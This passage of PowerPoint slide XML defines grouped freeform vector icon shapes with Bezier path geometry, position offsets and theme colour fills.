            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15082503" y="4774160"/>
              <a:ext cx="176907" cy="152783"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 28 w 447"/>
                <a:gd name="T1" fmla="*/ 382 h 382"/>
                <a:gd name="T2" fmla="*/ 9 w 447"/>
                <a:gd name="T3" fmla="*/ 373 h 382"/>
                <a:gd name="T4" fmla="*/ 12 w 447"/>
                <a:gd name="T5" fmla="*/ 338 h 382"/>
                <a:gd name="T6" fmla="*/ 402 w 447"/>
                <a:gd name="T7" fmla="*/ 9 h 382"/>
                <a:gd name="T8" fmla="*/ 438 w 447"/>
                <a:gd name="T9" fmla="*/ 12 h 382"/>
                <a:gd name="T10" fmla="*/ 435 w 447"/>
                <a:gd name="T11" fmla="*/ 48 h 382"/>
                <a:gd name="T12" fmla="*/ 45 w 447"/>
                <a:gd name="T13" fmla="*/ 377 h 382"/>
                <a:gd name="T14" fmla="*/ 28 w 447"/>
                <a:gd name="T15" fmla="*/ 382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7" h="382">
                  <a:moveTo>
                    <a:pt x="28" y="382"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="382"/>
                    <a:pt x="14" y="379"/>
                    <a:pt x="9" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="363"/>
                    <a:pt x="1" y="347"/>
                    <a:pt x="12" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="9"/>
                    <a:pt x="402" y="9"/>
                    <a:pt x="402" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="413" y="0"/>
                    <a:pt x="429" y="1"/>
                    <a:pt x="438" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="447" y="23"/>
                    <a:pt x="445" y="39"/>
                    <a:pt x="435" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="377"/>
                    <a:pt x="45" y="377"/>
                    <a:pt x="45" y="377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="381"/>
                    <a:pt x="34" y="382"/>
                    <a:pt x="28" y="3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69" name="Freeform 780">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D55E71F-CC5D-094F-A88D-E9D5F408251E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15452399" y="4774160"/>
              <a:ext cx="176907" cy="152783"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 419 w 447"/>
                <a:gd name="T1" fmla="*/ 382 h 382"/>
                <a:gd name="T2" fmla="*/ 402 w 447"/>
                <a:gd name="T3" fmla="*/ 377 h 382"/>
                <a:gd name="T4" fmla="*/ 12 w 447"/>
                <a:gd name="T5" fmla="*/ 48 h 382"/>
                <a:gd name="T6" fmla="*/ 9 w 447"/>
                <a:gd name="T7" fmla="*/ 12 h 382"/>
                <a:gd name="T8" fmla="*/ 45 w 447"/>
                <a:gd name="T9" fmla="*/ 9 h 382"/>
                <a:gd name="T10" fmla="*/ 435 w 447"/>
                <a:gd name="T11" fmla="*/ 338 h 382"/>
                <a:gd name="T12" fmla="*/ 438 w 447"/>
                <a:gd name="T13" fmla="*/ 373 h 382"/>
                <a:gd name="T14" fmla="*/ 419 w 447"/>
                <a:gd name="T15" fmla="*/ 382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7" h="382">
                  <a:moveTo>
                    <a:pt x="419" y="382"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="413" y="382"/>
                    <a:pt x="407" y="381"/>
                    <a:pt x="402" y="377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="48"/>
                    <a:pt x="12" y="48"/>
                    <a:pt x="12" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="39"/>
                    <a:pt x="0" y="23"/>
                    <a:pt x="9" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="1"/>
                    <a:pt x="34" y="0"/>
                    <a:pt x="45" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="435" y="338"/>
                    <a:pt x="435" y="338"/>
                    <a:pt x="435" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="347"/>
                    <a:pt x="447" y="363"/>
                    <a:pt x="438" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="433" y="379"/>
                    <a:pt x="426" y="382"/>
                    <a:pt x="419" y="3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70" name="Freeform 781">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE4DFA5A-7631-9243-A49A-852CEC4D7B05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15220811" y="4368883"/>
              <a:ext cx="371504" cy="273401"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 908 w 934"/>
                <a:gd name="T1" fmla="*/ 687 h 687"/>
                <a:gd name="T2" fmla="*/ 883 w 934"/>
                <a:gd name="T3" fmla="*/ 661 h 687"/>
                <a:gd name="T4" fmla="*/ 883 w 934"/>
                <a:gd name="T5" fmla="*/ 176 h 687"/>
                <a:gd name="T6" fmla="*/ 758 w 934"/>
                <a:gd name="T7" fmla="*/ 51 h 687"/>
                <a:gd name="T8" fmla="*/ 26 w 934"/>
                <a:gd name="T9" fmla="*/ 51 h 687"/>
                <a:gd name="T10" fmla="*/ 0 w 934"/>
                <a:gd name="T11" fmla="*/ 26 h 687"/>
                <a:gd name="T12" fmla="*/ 26 w 934"/>
                <a:gd name="T13" fmla="*/ 0 h 687"/>
                <a:gd name="T14" fmla="*/ 758 w 934"/>
                <a:gd name="T15" fmla="*/ 0 h 687"/>
                <a:gd name="T16" fmla="*/ 934 w 934"/>
                <a:gd name="T17" fmla="*/ 176 h 687"/>
                <a:gd name="T18" fmla="*/ 934 w 934"/>
                <a:gd name="T19" fmla="*/ 661 h 687"/>
                <a:gd name="T20" fmla="*/ 908 w 934"/>
                <a:gd name="T21" fmla="*/ 687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4" h="687">
                  <a:moveTo>
                    <a:pt x="908" y="687"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="894" y="687"/>
                    <a:pt x="883" y="675"/>
                    <a:pt x="883" y="661"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="883" y="176"/>
                    <a:pt x="883" y="176"/>
                    <a:pt x="883" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="883" y="107"/>
                    <a:pt x="827" y="51"/>
                    <a:pt x="758" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="51"/>
                    <a:pt x="26" y="51"/>
                    <a:pt x="26" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="51"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="12"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="26" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758" y="0"/>
                    <a:pt x="758" y="0"/>
                    <a:pt x="758" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="855" y="0"/>
                    <a:pt x="934" y="79"/>
                    <a:pt x="934" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="934" y="661"/>
                    <a:pt x="934" y="661"/>
                    <a:pt x="934" y="661"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="934" y="675"/>
                    <a:pt x="922" y="687"/>
                    <a:pt x="908" y="6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71" name="Freeform 782">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F2AAF65-C5F7-3944-9FD7-331A09C891BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15105018" y="4368882"/>
              <a:ext cx="86845" cy="262144"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 220"/>
                <a:gd name="T1" fmla="*/ 659 h 659"/>
                <a:gd name="T2" fmla="*/ 0 w 220"/>
                <a:gd name="T3" fmla="*/ 633 h 659"/>
                <a:gd name="T4" fmla="*/ 0 w 220"/>
                <a:gd name="T5" fmla="*/ 176 h 659"/>
                <a:gd name="T6" fmla="*/ 176 w 220"/>
                <a:gd name="T7" fmla="*/ 0 h 659"/>
                <a:gd name="T8" fmla="*/ 195 w 220"/>
                <a:gd name="T9" fmla="*/ 0 h 659"/>
                <a:gd name="T10" fmla="*/ 220 w 220"/>
                <a:gd name="T11" fmla="*/ 26 h 659"/>
                <a:gd name="T12" fmla="*/ 195 w 220"/>
                <a:gd name="T13" fmla="*/ 51 h 659"/>
                <a:gd name="T14" fmla="*/ 176 w 220"/>
                <a:gd name="T15" fmla="*/ 51 h 659"/>
                <a:gd name="T16" fmla="*/ 51 w 220"/>
                <a:gd name="T17" fmla="*/ 176 h 659"/>
                <a:gd name="T18" fmla="*/ 51 w 220"/>
                <a:gd name="T19" fmla="*/ 633 h 659"/>
                <a:gd name="T20" fmla="*/ 25 w 220"/>
                <a:gd name="T21" fmla="*/ 659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659">
                  <a:moveTo>
                    <a:pt x="25" y="659"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="659"/>
                    <a:pt x="0" y="647"/>
                    <a:pt x="0" y="633"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="176"/>
                    <a:pt x="0" y="176"/>
                    <a:pt x="0" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="79"/>
                    <a:pt x="79" y="0"/>
                    <a:pt x="176" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="0"/>
                    <a:pt x="195" y="0"/>
                    <a:pt x="195" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="0"/>
                    <a:pt x="220" y="12"/>
                    <a:pt x="220" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="40"/>
                    <a:pt x="209" y="51"/>
                    <a:pt x="195" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="51"/>
                    <a:pt x="176" y="51"/>
                    <a:pt x="176" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="51"/>
                    <a:pt x="51" y="107"/>
                    <a:pt x="51" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="633"/>
                    <a:pt x="51" y="633"/>
                    <a:pt x="51" y="633"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="647"/>
                    <a:pt x="39" y="659"/>
                    <a:pt x="25" y="6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73" name="Freeform 783">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD83D677-C9F4-FF4E-BD8F-AA89307736C5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15185430" y="4466984"/>
              <a:ext cx="332907" cy="19299"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 813 w 838"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 25 w 838"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 838"/>
                <a:gd name="T5" fmla="*/ 25 h 51"/>
                <a:gd name="T6" fmla="*/ 25 w 838"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 813 w 838"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 838 w 838"/>
                <a:gd name="T11" fmla="*/ 25 h 51"/>
                <a:gd name="T12" fmla="*/ 813 w 838"/>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838" h="51">
                  <a:moveTo>
                    <a:pt x="813" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="51"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="813" y="0"/>
                    <a:pt x="813" y="0"/>
                    <a:pt x="813" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="827" y="0"/>
                    <a:pt x="838" y="11"/>
                    <a:pt x="838" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="838" y="39"/>
                    <a:pt x="827" y="51"/>
                    <a:pt x="813"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78" name="Freeform 784">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A383029-D4A1-3B4B-B5AB-649485D90010}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15185430" y="4529706"/>
              <a:ext cx="229979" cy="19299"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 555 w 580"/>
                <a:gd name="T1" fmla="*/ 50 h 50"/>
                <a:gd name="T2" fmla="*/ 25 w 580"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 580"/>
                <a:gd name="T5" fmla="*/ 25 h 50"/>
                <a:gd name="T6" fmla="*/ 25 w 580"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 555 w 580"/>
                <a:gd name="T9" fmla="*/ 0 h 50"/>
                <a:gd name="T10" fmla="*/ 580 w 580"/>
                <a:gd name="T11" fmla="*/ 25 h 50"/>
                <a:gd name="T12" fmla="*/ 555 w 580"/>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580" h="50">
                  <a:moveTo>
                    <a:pt x="555" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="50"/>
                    <a:pt x="25" y="50"/>
                    <a:pt x="25" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="50"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="555" y="0"/>
                    <a:pt x="555" y="0"/>
                    <a:pt x="555" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="569" y="0"/>
                    <a:pt x="580" y="11"/>
                    <a:pt x="580" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="39"/>
                    <a:pt x="569" y="50"/>
                    <a:pt x="555"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81" name="Freeform 785">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4044346-780B-F440-ABEF-4AA813625F4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15441141" y="4529706"/>
              <a:ext cx="69155" cy="19299"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 147 w 172"/>
                <a:gd name="T1" fmla="*/ 50 h 50"/>
                <a:gd name="T2" fmla="*/ 25 w 172"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 172"/>
                <a:gd name="T5" fmla="*/ 25 h 50"/>
                <a:gd name="T6" fmla="*/ 25 w 172"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 147 w 172"/>
                <a:gd name="T9" fmla="*/ 0 h 50"/>
                <a:gd name="T10" fmla="*/ 172 w 172"/>
                <a:gd name="T11" fmla="*/ 25 h 50"/>
                <a:gd name="T12" fmla="*/ 147 w 172"/>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172" h="50">
                  <a:moveTo>
                    <a:pt x="147" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="50"/>
                    <a:pt x="25" y="50"/>
                    <a:pt x="25" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="50"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="0"/>
                    <a:pt x="147" y="0"/>
                    <a:pt x="147" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="0"/>
                    <a:pt x="172" y="11"/>
                    <a:pt x="172" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="39"/>
                    <a:pt x="161" y="50"/>
                    <a:pt x="14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82" name="Freeform 786">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3F82620-E150-E14D-B0E5-E5125BF82AD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15185430" y="4592427"/>
              <a:ext cx="332907" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 813 w 838"/>
                <a:gd name="T1" fmla="*/ 51 h 51"/>
                <a:gd name="T2" fmla="*/ 25 w 838"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 838"/>
                <a:gd name="T5" fmla="*/ 25 h 51"/>
                <a:gd name="T6" fmla="*/ 25 w 838"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 813 w 838"/>
                <a:gd name="T9" fmla="*/ 0 h 51"/>
                <a:gd name="T10" fmla="*/ 838 w 838"/>
                <a:gd name="T11" fmla="*/ 25 h 51"/>
                <a:gd name="T12" fmla="*/ 813 w 838"/>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838" h="51">
                  <a:moveTo>
                    <a:pt x="813" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                    <a:pt x="25" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="51"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="813" y="0"/>
                    <a:pt x="813" y="0"/>
                    <a:pt x="813" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="827" y="0"/>
                    <a:pt x="838" y="11"/>
                    <a:pt x="838" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="838" y="39"/>
                    <a:pt x="827" y="51"/>
                    <a:pt x="813"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83" name="Freeform 787">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFFB7EB4-E9DA-1247-9E0D-2719F58464B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="15240110" y="4655150"/>
              <a:ext cx="231587" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 555 w 580"/>
                <a:gd name="T1" fmla="*/ 50 h 50"/>
                <a:gd name="T2" fmla="*/ 25 w 580"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 580"/>
                <a:gd name="T5" fmla="*/ 25 h 50"/>
                <a:gd name="T6" fmla="*/ 25 w 580"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 555 w 580"/>
                <a:gd name="T9" fmla="*/ 0 h 50"/>
                <a:gd name="T10" fmla="*/ 580 w 580"/>
                <a:gd name="T11" fmla="*/ 25 h 50"/>
                <a:gd name="T12" fmla="*/ 555 w 580"/>
                <a:gd name="T13" fmla="*/ 50 h 50"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T12" y="T13"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="580" h="50">
                  <a:moveTo>
                    <a:pt x="555" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="50"/>
                    <a:pt x="25" y="50"/>
                    <a:pt x="25" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="50"/>
                    <a:pt x="0" y="39"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="555" y="0"/>
                    <a:pt x="555" y="0"/>
                    <a:pt x="555" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="569" y="0"/>
                    <a:pt x="580" y="11"/>
                    <a:pt x="580" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="39"/>
                    <a:pt x="569" y="50"/>
                    <a:pt x="555"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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="84" name="Group 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4611A673-7DE1-C34A-AD2E-C9F000CAF083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3426402" y="3524997"/>
            <a:ext cx="324240" cy="378557"/>
            <a:chOff x="10228824" y="4282038"/>
            <a:chExt cx="623998" cy="728533"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="Freeform 1028">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B80283-2793-F74C-BD8D-B560F1141FFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10326926" y="4835273"/>
              <a:ext cx="115793" cy="22515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 264 w 292"/>
                <a:gd name="T1" fmla="*/ 57 h 57"/>
                <a:gd name="T2" fmla="*/ 28 w 292"/>
                <a:gd name="T3" fmla="*/ 57 h 57"/>
                <a:gd name="T4" fmla="*/ 0 w 292"/>
                <a:gd name="T5" fmla="*/ 29 h 57"/>
                <a:gd name="T6" fmla="*/ 28 w 292"/>
                <a:gd name="T7" fmla="*/ 0 h 57"/>
                <a:gd name="T8" fmla="*/ 264 w 292"/>
                <a:gd name="T9" fmla="*/ 0 h 57"/>
                <a:gd name="T10" fmla="*/ 292 w 292"/>
                <a:gd name="T11" fmla="*/ 29 h 57"/>
                <a:gd name="T12" fmla="*/ 264 w 292"/>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292" h="57">
                  <a:moveTo>
                    <a:pt x="264" y="57"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="57"/>
                    <a:pt x="28" y="57"/>
                    <a:pt x="28" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="57"/>
                    <a:pt x="0" y="44"/>
                    <a:pt x="0" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="13"/>
                    <a:pt x="12" y="0"/>
                    <a:pt x="28" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="264" y="0"/>
                    <a:pt x="264" y="0"/>
                    <a:pt x="264" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="0"/>
                    <a:pt x="292" y="13"/>
                    <a:pt x="292" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="292" y="44"/>
                    <a:pt x="279" y="57"/>
                    <a:pt x="26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90" name="Freeform 1029">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D555113C-27C4-B246-B7BD-94FA98E9F170}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10326926" y="4894778"/>
              <a:ext cx="311999" cy="20908"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 757 w 783"/>
                <a:gd name="T1" fmla="*/ 53 h 53"/>
                <a:gd name="T2" fmla="*/ 26 w 783"/>
                <a:gd name="T3" fmla="*/ 53 h 53"/>
                <a:gd name="T4" fmla="*/ 0 w 783"/>
                <a:gd name="T5" fmla="*/ 26 h 53"/>
                <a:gd name="T6" fmla="*/ 26 w 783"/>
                <a:gd name="T7" fmla="*/ 0 h 53"/>
                <a:gd name="T8" fmla="*/ 757 w 783"/>
                <a:gd name="T9" fmla="*/ 0 h 53"/>
